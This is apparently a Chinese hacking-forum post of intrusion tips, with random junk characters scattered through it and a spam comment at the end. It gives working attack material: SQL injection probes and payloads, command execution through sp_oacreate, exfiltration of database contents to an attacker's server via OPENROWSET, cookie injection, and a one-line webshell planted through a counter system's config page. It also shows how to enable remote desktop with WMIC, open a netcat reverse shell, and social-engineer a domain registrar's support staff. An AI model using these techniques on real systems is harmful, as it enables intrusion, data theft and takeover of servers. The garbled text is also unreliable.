P" y4 ]0 t# k7 a注射点不显错,执行下面三条语句页面都返回正常。) t/ H: U. b3 D1 b
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') 7 _2 I" I5 }3 u+ a, Y) g: {and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask') - ^& ]3 N! s& V' }9 t' A# Fand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')" D e7 }6 }' z. u2 P
可以列目录,判断系统为2000,web与数据库分离5 f3 c# o- R1 M! e! E% r3 ]
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。4 C! G }# e. J3 ^$ x1 G
在注射点上执行 - i# n# L! \7 N+ U* Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';-- + l9 j4 K* E8 T' b& g页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP # F T+ X4 R8 {, R" [还有我用NC监听得其他端口都没有得到IP。* j: R0 e2 y$ n; t9 E
" o8 R6 y/ Y8 g8 U7 O* { F+ L/ [
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。$ g s% E G5 m; g: y; C# R
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases-- # s. C$ r' a$ t0 W! M; S5 [0 N7 z1 l
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--# Z( F8 M8 {: t. d
s5 o/ \8 X, ? U/ ?4 \ R现在就猜想是不是数据库是内网而且不能连外网。 ) j' z, @. H/ I! e; D. j" J3 L$ a' X1 s; w4 _) S
5 O9 ~6 j2 s# h& n" `% J/ w/ D$ Jaccess导出txt文本代码 / R ?9 m7 ^7 S" I S" uSELECT * into [test.txt] in 'd:\web\' 'text;' from admin 7 C5 n$ A; d# |0 t# Y8 r6 A, t$ l$ H/ x) A) o# z& ]) H+ L, q2 \
/ h% u* m" l( ]9 \ D
# C# a r$ m8 M4 R/ u
自动跳转到指定网站代码头1 Y' ?" \- B& [3 s5 r: K
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'> / T, ?/ V! ?; [* I3 n0 [- T- W5 ?2 c/ L* q
* g: V% B5 k' U+ X5 @入侵java or jsp站点时默认配置文件路径:3 I: j* J D% [* S" f' b" C
\web-inf\web.xml # g( o: g1 M, g, q2 ~7 h/ A. qtomcat下的配置文件位置:. U9 o5 Z+ A% K: a3 x I0 u9 s
\conf\server.xml (前面加上tomcat路径)9 j9 P& T2 Z2 N8 E4 H' l
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml. i4 t, d! w: y
7 T/ T8 I d) p! T; G% ~1 E7 s* {5 @6 ~0 d3 }0 {+ J# ?( G
5 p$ \( r* ^3 [+ Z! ^, b- E检测注入点新方法运算符法,在过滤了and or cookies时用比有效果: - ?- { Q% ^0 K+ B/ j: }# s1 X-1%237 K* N2 `, y( x
> * v* U: B, Q7 E+ N& Z
<8 w: W, d8 ~# A. m% Y" k$ o, k
1'+or+'1'='1 ( J9 @( W5 y5 R; Lid=8%bf / h( i4 h- s W5 _2 m( n$ {! I! J5 q) k; h7 {/ N7 ]1 E
全新注入点检测试法: 7 Q: @" N( e. d6 A在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。5 y/ d$ a! d. v2 @
% g3 s$ Q- I8 n% o
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。+ B5 O' `7 b# N0 J, Y8 p2 w
1 i2 N/ U( {8 m Y: H0 Z搜索型注入判断方法: ) j$ v* X' c9 u5 P. Z% k北京%' and '1'='1' and '%'=' 9 {# ^5 W6 y& G( w北京%' and '1'='2' and '%'=' ' r" E8 i1 ?* G) g) Y; Y' J7 Q( P( K7 B
z% f( R! Z. y6 hCOOKIES注入: ; b9 O, t1 ^& q: r4 K V- r 9 m) a" T/ u, n9 J' Mjavascript:alert(document.cookie="id="+escape("51 and 1=1"));# M6 E4 D' S9 B5 e8 H
0 n( y1 x9 x3 |' R8 g2000专业版查看本地登录用户命令: i) d1 {5 m" e6 L/ j! _6 N
net config workstation 4 g. t5 \* ?4 W1 v% z9 S0 q. @7 c4 ]$ r h! k3 S4 A
$ _1 g7 @6 W# D* @
2003下查看ipsec配置和默认防火墙配置命令:. [% Q2 B1 Q5 T- j T, P
netsh firewall show config 6 K6 L( O$ L" g8 A5 J: R4 gnetsh ipsec static show all; \% U' _) F- y% ?3 r. f& p
% o: a6 x( k' U不指派指定策略命令: 4 u8 Z' n/ K' W: unetsh ipsec static set policy name=test assign=n (test是不指派的策略名) 0 a8 Q: Y9 }. w( w3 D. V$ T) n4 ?netsh ipsec static show policy all 显示策略名0 ^6 X& J2 q2 b
, S1 k' w& b0 Z0 C1 V; G7 Y8 Z i; u/ D
猜管理员后台小技巧: . c# w4 \% ?- ladmin/left.asp : j: q ]& J* P/ R% w
admin/main.asp 1 ^# C0 r4 l2 n2 X& qadmin/top.asp K% g8 ^* h, o: {" {8 I; |
admin/admin.asp 2 Y3 M3 s3 I6 F# A, A& S, r# F会现出菜单导航,然后迅雷下载全部链接0 n/ e# i. K: L
: k+ O) Z* }# g2 H7 ]. M
2 \. |( U6 u: }3 c% |, i4 p' m
社会工程学: - ^, f4 g! s5 n: t) o" H用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人 # a7 C' m0 d$ @' n) [% l) A% h# f然后去骗客服9 n8 y* T2 _" F; a0 O+ @
F2 S. e5 ]$ B; n7 U4 C6 _
/ d' f& r1 y/ @ }9 N( N8 ~0 g
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 3 S" H( \. g# \8 k& I" G
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, # F$ |) ?) _8 ~$ F3 D 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。2 u/ Q' L6 h% z3 y* _
2 P* ^& N. @, L+ C0 G
/ C" P8 o* i$ o' f8 `: R
/ B% C9 \/ { u; a + `" w# o5 P7 N' _! f' _CMD加密注册表位置 # w' d# V$ i0 I4 w(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor ! @$ M$ Q8 m$ ZAutoRun $ ?: e" j: y* q- u0 X, L7 f5 @% B. H, G
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor7 K' s: e7 C2 Y( P' S
AutoRun, I S! N( D# p# ?1 B
& K% A9 `, T) X * A: D1 Y+ g6 m+ H: P在找注入时搜索Hidden,把他改成test$ Q* W2 x: k. f$ Z S- Y
, G' R! I0 n) ^& P * {! \8 F1 T' T9 x/ ? ( {, Q! g9 m3 [; d# xmstsc /v:IP /console ! q) R8 ]) y8 { c7 X 6 P4 w- a5 ]) q3 p+ @8 Q# Z' u2 { " r7 Z' n$ K m1 q9 V6 n4 r$ u; N一句话开3389:7 ?& J( h7 h8 K7 i# `
2 i, {8 O3 }* M1 K A
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> , i% T0 s' f2 V9 E, l开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. $ R! k0 B1 y8 W. Q" _& C! ?+ m6 @3 Z7 R
, q. Y" P2 D: `3 |# ?; H
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: 4 h% h/ q4 N! ^ l+ fInsert into admin(user,pwd) values('test','test')/ ^* X8 l8 s& Q5 S1 e
! s: Z& o, c& c$ P, @
+ V/ N" R) K( @" M; O2 tNC反弹 " C: E5 ]% h# R4 {7 a5 z先在本机执行: nc -vv -lp 监听的端口 (自己执行) 6 H3 A4 |( P2 i! U
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行) ; w. l& `6 e9 O0 I; U + u2 J+ W. R) N1 m& R # T ]" c" t4 g; R8 L% X在脚本入侵过程中要经常常试用%00来确认下参数是否有问题- O3 k3 {* E1 o
8 h- ^; S0 s6 P/ ^: }0 v( m8 `- }
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 & N# E' c1 l9 ?例如: % \8 \( L! Y/ i) tsubst k: d:\www\ 用d盘www目录替代k盘 . v$ }: U& P: k, Q8 [% ^subst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta